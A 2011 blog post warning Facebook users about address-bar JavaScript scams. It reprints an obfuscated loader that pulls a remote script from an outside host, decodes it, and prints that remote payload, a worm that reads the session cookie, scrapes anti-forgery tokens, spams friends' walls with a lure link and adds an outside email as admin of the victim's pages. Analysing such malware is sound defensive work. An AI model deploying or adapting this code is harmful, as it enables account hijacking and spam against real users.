Protect yourself against fraud & identity theft on Facebook – More scripts!

Due to the increased interest people have in this matter and to the fact that the JavaScript/Facebook scams are becoming way to common, i feel compelled to follow up and present another script used to … steal your Facebook informations, impersonate you and everything you can think of …

For those of you unfamiliar with what i am talking about please read first my previous post.
Please remember: Never write any JavaScript script or any other script in your browser’s address bar! It’s almost for sure designed to steal something from you, no matter that we talk about Facebook or something else.

I admit not testing the script myself ( unlike the first script i did tried 🙂 ). Let’s hope is not a functional one and that not so many people used it but, as i see it, soon the internet will be flooded with such scripts if it’s not already ! The problem is that usually people don’t even alarm themselves until their Facebook is already full of spam and at that point some don’t know what is the problem and what is that they need to do.

The answer is simple: Logout then login again, reset your personal publishing address, leave the groups you have been forcefully opted in.

Here is the script that i have found posted by many … in some Serbian Facebook group…

javascript:
var _0x9557=[
“\x73\x72\x63”,
“\x73\x63\x72\x69\x70\x74”,
“\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74”,
“\x2f\x2f\x69\x67\x72\x65\x2d\x6b\x75\x68\x61\x6e\x6a\x61
\x2e\x63\x6f\x6d\x2f\x66\x62\x2f\x62\x2e\x6a\x73\x3f\x73\x68”,
“\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64”,
“\x62\x6F\x64\x79”];
(a=(b=document)[_0x9557[2]](_0x9557[1]))[_0x9557[0]]=_0x9557[3];
b[_0x9557[5]][_0x9557[4]](a);
void (0);

Translated into a human readable form:

javascript:
var _0x9557=[
“src”,
“script”,
“createElement”,
“//i_g_r_e-k_u_h_a_n_j_a.com/fb/b.js?sh”,
“appendChild”,
“body”];
(a=(b=document)[_0x9557[2]](_0x9557[1]))[_0x9557[0]]=_0x9557[3];
b[_0x9557[5]][_0x9557[4]](a);
void (0);

And we check the website in question for the b.js script that the first script loads. Looking at this script i was even a bit surprised. There are beautiful explainations on how the script steals from you directly in the code. So with no more useless comments here is the script:

//These are to be posted as status messages
txt = “Nevjerojatni šokantni video obavezno pogledaj http://www.facebook.com/pages/Sokantni-video/176064629096511 “;
txtee = “Nevjerojatni šokantni video obavezno pogledaj http://www.facebook.com/pages/Sokantni-video/176064629096511”;

alert(“Sačekajte par minuta, u toku je provera. Pa kliknite OK da nastavite.”);
with(x = new XMLHttpRequest()) open(“GET”, “/”), onreadystatechange = function () {

if (x.readyState == 4 && x.status == 200) {
z=x.responseText;
//comp = z.match(/name=”UIComposer_STATE_PIC_OUTSIDE” value=”([\d\w]+)”/i)[1];
// comp = x.responseText.match(/name=”UIComposer_STATE_PIC_OUTSIDE” id=”([\d\w]+)”/i)[1];
form = z.match(/name=”post_form_id” value=”([\d\w]+)”/i)[1];
dt = z.match(/name=”fb_dtsg” value=”([\d\w-_]+)”/i)[1];
pfid = z.match(/name=”post_form_id” value=”([\d\w]+)”/i)[1];

with(xx = new XMLHttpRequest())
open(“GET”, “/ajax/browser/friends/?uid=” +
document.cookie.match(/c_user=(\d+)/)[1] +
“&filter=all&__a=1&__d=1”),
onreadystatechange = function () {
//extracts list of friends

if (xx.readyState == 4 && xx.status == 200) {
m = xx.responseText.match(/\/\d+_\d+_\d+_q\.jpg/gi).join(“\n”).replace(/(\/\d+_|_\d+_q\.jpg)/gi, “”).split(“\n”);
//facebook returns list of friends images of the form of three numbers separated by _,
//the above regular expression extracts out the middle of the two
//(which infact is the userID of friend)
i = 0;
llimit=25;
t = setInterval(function () {
if (i >= llimit )
return;//it seems the limit is 25 posts per 2 seconds on facebook (to be counted as bot)
if(i == 0) {//do it only once
with(ddddd = new XMLHttpRequest()) open(“GET”, “/ajax/pages/dialog/manage_pages.php?__a=1&__d=1”),
setRequestHeader(“X-Requested-With”, null),
setRequestHeader(“X-Requested”, null),
onreadystatechange = function() {
if(ddddd.readyState == 4 && ddddd.status == 200) {
llm = (d = ddddd.responseText).match(/\\”id\\”:([\d]+)/gi); len =llm.length;
j=0;
for(j=0;j with(xxxcxxx = new XMLHttpRequest()) open(“POST”, “/pages/edit/?id=”+llm[j].replace(/\\”id\\”:/i, “”)
+”&sk=admin”),
setRequestHeader(“Content-Type”, “application/x-www-form-urlencoded”),
send(“post_form_id=”+pfid+”&fb_dtsg=”+dt+”&fbpage_id=”+llm[j].replace(/\\”id\\”:/i, “”)+
“&friendselector_input%5B%5D=miroantic%40net.hr%09&friend_selected%5B%5D=&save=1”);
//I am not very sure on this one but it seems it adds as admin of all pages the user holds
}
}
}, send(null); //end of function to change the admins
// this one collects cookie as well as the personalized status update email address
// (a photo sent to that address is posted on the wall directly)
}
//following code does status update
//the code writes message represented by txt and txtee alternately on the wall of friends.
//txt and txtee are same though (may be author’s mistake)
if(i%2==0)
{
with(xd = new XMLHttpRequest()) open(“POST”, “/ajax/updatestatus.php?__a=1”),
setRequestHeader(“Content-Type”, “application/x-www-form-urlencoded”),
send(“action=PROFILE_UPDATE&profile_id=” + document.cookie.match(/c_user=(\d+)/)[1] + “&status=” + txt +
“&target_id=” + m[Math.floor(Math.random() * m.length)] +
//m is an array of id of friends (was created early in the script exec), choose a random friend
“&composer_id=” +
“&hey_kid_im_a_composer=true&display_context=profile&post_form_id=” +form + “&fb_dtsg=” + dt +
//comp, form, dt are (probably) XSRF prevention tokens
“&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest”);
}
else
{
with(xd = new XMLHttpRequest()) open(“POST”, “/ajax/updatestatus.php?__a=1”),
setRequestHeader(“Content-Type”, “application/x-www-form-urlencoded”),
send(“action=PROFILE_UPDATE&profile_id=” + document.cookie.match(/c_user=(\d+)/)[1] + “&status=” + txtee +
“&target_id=” + m[Math.floor(Math.random() * m.length)] + “&composer_id=”+
“&hey_kid_im_a_composer=true&display_context=profile&post_form_id=” + form + “&fb_dtsg=” + dt +
“&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest”);
}
i += 1;
}, 2000);// 2000 milli-sec window, after which the script is executed again
}
}, send(null);
}
}, send(null);

The comments inside the script are self explanatory.

Share

Tags: , , , , , , , ,

2 Responses to “Protect yourself against fraud & identity theft on Facebook – More scripts!”

  1. Useful for me » Blog Archive » Protect yourself against fraud & identity theft on Facebook – FAKE Facebook Time Checker ! Says:
    January 23rd, 2011 at 12:01 pm

    […] users are also tricked into using a different form of script. I have dedicated another post for this one. The principle is the same. One would insert a JavaScript into browser address bar that loads in […]

  2. Üble JavaScript-Schadsoftware für Facebook « Unser täglich Spam Says:
    January 24th, 2011 at 8:47 am

    […] wurden mit einer etwas anderen Form dieses Skriptes ausgetrickst. Für dieses andere Skript habe ich einen eigenen Post verfasst. Das Prinzip ist das gleiche. Etwas JavaScript wird in die Adresszeile des Browsers eingefügt, […]

Leave a Reply